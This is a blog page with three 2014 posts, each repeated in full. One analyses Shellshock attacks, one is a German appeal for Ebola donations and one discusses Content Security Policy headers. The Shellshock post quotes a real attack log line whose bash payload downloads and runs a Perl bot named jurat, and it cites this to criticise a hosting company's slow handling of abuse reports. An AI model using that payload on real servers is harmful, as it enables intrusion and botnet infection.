Monday, September 29. 2014
Responsibility in running Internet infrastructure
If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.
After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them: - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget;curl -O /var/tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.
For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.
I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.
On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.
Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.
When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.
After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them: - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget;curl -O /var/tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.
For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.
I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.
On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.
Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.
When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.
Posted by Hanno Böck
in Computer culture, English, Linux, Politics, Security
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Monday, September 22. 2014
Mehr als 15 Cent
Seit Monaten können wir fast täglich neue Schreckensmeldungen über die Ebola-Ausbreitung lesen. Ich denke die muss ich hier nicht wiederholen.
Ebola ist für viele von uns - mich eingeschlossen - weit weg. Und das nicht nur im räumlichen Sinne. Ich habe noch nie einen Ebola-Patienten gesehen, über die betroffenen Länder wie Sierra Leone, Liberia oder Guinea weiß ich fast nichts. Ähnlich wie mir geht es sicher vielen. Ich habe viele der Meldungen auch nur am Rande wahrgenommen. Aber eine Sache habe ich mitgenommen: Das Problem ist nicht das man nicht wüsste wie man Ebola stoppen könnte. Das Problem ist dass man es nicht tut, dass man denen, die helfen wollen - oftmals unter Einsatz ihres eigenen Lebens - nicht genügend Mittel zur Verfügung stellt.
Eine Zahl, die ich in den letzten Tagen gelesen habe, beschäftigt mich: Die Bundesregierung hat bisher 12 Millionen Euro für die Ebola-Hilfe zur Verfügung gestellt. Das sind umgerechnet etwa 15 Cent pro Einwohner. Mir fehlen die Worte das adäquat zu beschreiben. Es ist irgendwas zwischen peinlich, verantwortungslos und skandalös. Deutschland ist eines der wohlhabendsten Länder der Welt. Vergleiche mit Bankenrettungen oder Tiefbahnhöfen erspare ich mir jetzt.
Ich habe gestern einen Betrag an Ärzte ohne Grenzen gespendet. Ärzte ohne Grenzen ist soweit ich das wahrnehme im Moment die wichtigste Organisation, die vor Ort versucht zu helfen. Alles was ich über Ärzte ohne Grenzen weiß gibt mir das Gefühl dass mein Geld dort gut aufgehoben ist. Es war ein Betrag, der um mehrere Größenordnungen höher als 15 Cent war, aber es war auch ein Betrag, der mir mit meinen finanziellen Möglichkeiten nicht weh tut.
Ich finde das eigentlich nicht richtig. Ich finde es sollte selbstverständlich sein dass in so einer Notsituation die Weltgemeinschaft hilft. Es sollte nicht von Spenden abhängen, ob man eine tödliche Krankheit bekämpft oder nicht. Ich will eigentlich mit meinen Steuergeldern für so etwas zahlen. Aber die Realität ist: Das geschieht im Moment nicht.
Ich schreibe das hier nicht weil ich betonen möchte wie toll ich bin. Ich schreibe das weil ich Dich, der das jetzt liest, bitten möchte, das selbe tust. Ich glaube jeder, der hier mitliest, ist in der Lage, mehr als 15 Cent zu spenden. Spende einen Betrag, der Dir angesichts Deiner finanziellen Situation bezahlbar und angemessen erscheint. Jetzt sofort. Es dauert nur ein paar Minuten:
Online für Ärzte ohne Grenzen spenden
(Ich freue mich wenn dieser Beitrag verbreitet / geteilt wird - zum Beispiel mit dem Hashtag #mehrals15cent)
Ebola ist für viele von uns - mich eingeschlossen - weit weg. Und das nicht nur im räumlichen Sinne. Ich habe noch nie einen Ebola-Patienten gesehen, über die betroffenen Länder wie Sierra Leone, Liberia oder Guinea weiß ich fast nichts. Ähnlich wie mir geht es sicher vielen. Ich habe viele der Meldungen auch nur am Rande wahrgenommen. Aber eine Sache habe ich mitgenommen: Das Problem ist nicht das man nicht wüsste wie man Ebola stoppen könnte. Das Problem ist dass man es nicht tut, dass man denen, die helfen wollen - oftmals unter Einsatz ihres eigenen Lebens - nicht genügend Mittel zur Verfügung stellt.
Eine Zahl, die ich in den letzten Tagen gelesen habe, beschäftigt mich: Die Bundesregierung hat bisher 12 Millionen Euro für die Ebola-Hilfe zur Verfügung gestellt. Das sind umgerechnet etwa 15 Cent pro Einwohner. Mir fehlen die Worte das adäquat zu beschreiben. Es ist irgendwas zwischen peinlich, verantwortungslos und skandalös. Deutschland ist eines der wohlhabendsten Länder der Welt. Vergleiche mit Bankenrettungen oder Tiefbahnhöfen erspare ich mir jetzt.
Ich habe gestern einen Betrag an Ärzte ohne Grenzen gespendet. Ärzte ohne Grenzen ist soweit ich das wahrnehme im Moment die wichtigste Organisation, die vor Ort versucht zu helfen. Alles was ich über Ärzte ohne Grenzen weiß gibt mir das Gefühl dass mein Geld dort gut aufgehoben ist. Es war ein Betrag, der um mehrere Größenordnungen höher als 15 Cent war, aber es war auch ein Betrag, der mir mit meinen finanziellen Möglichkeiten nicht weh tut.
Ich finde das eigentlich nicht richtig. Ich finde es sollte selbstverständlich sein dass in so einer Notsituation die Weltgemeinschaft hilft. Es sollte nicht von Spenden abhängen, ob man eine tödliche Krankheit bekämpft oder nicht. Ich will eigentlich mit meinen Steuergeldern für so etwas zahlen. Aber die Realität ist: Das geschieht im Moment nicht.
Ich schreibe das hier nicht weil ich betonen möchte wie toll ich bin. Ich schreibe das weil ich Dich, der das jetzt liest, bitten möchte, das selbe tust. Ich glaube jeder, der hier mitliest, ist in der Lage, mehr als 15 Cent zu spenden. Spende einen Betrag, der Dir angesichts Deiner finanziellen Situation bezahlbar und angemessen erscheint. Jetzt sofort. Es dauert nur ein paar Minuten:
Online für Ärzte ohne Grenzen spenden
(Ich freue mich wenn dieser Beitrag verbreitet / geteilt wird - zum Beispiel mit dem Hashtag #mehrals15cent)
Posted by Hanno Böck
in Life, Politics
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Defined tags for this entry: aerzteohnegrenzen, afrika, ebola, guinea, liberia, mehrals15cent, sierraleone
Friday, September 19. 2014
Some experience with Content Security Policy
I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example how to get IT security right.
The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.
CSP fixes XSS for good
The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.
CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.
To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.
For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");
The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.
This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src; object-src; style-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: * * *; media-src 'none'; frame-src 'self'; font-src; connect-src 'self'
Reporting feature
You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.
While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.
If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.
Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.
Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.
The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.
CSP fixes XSS for good
The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.
CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.
To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.
For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");
The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.
This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src; object-src; style-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: * * *; media-src 'none'; frame-src 'self'; font-src; connect-src 'self'
Reporting feature
You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.
While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.
If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.
Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.
Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.
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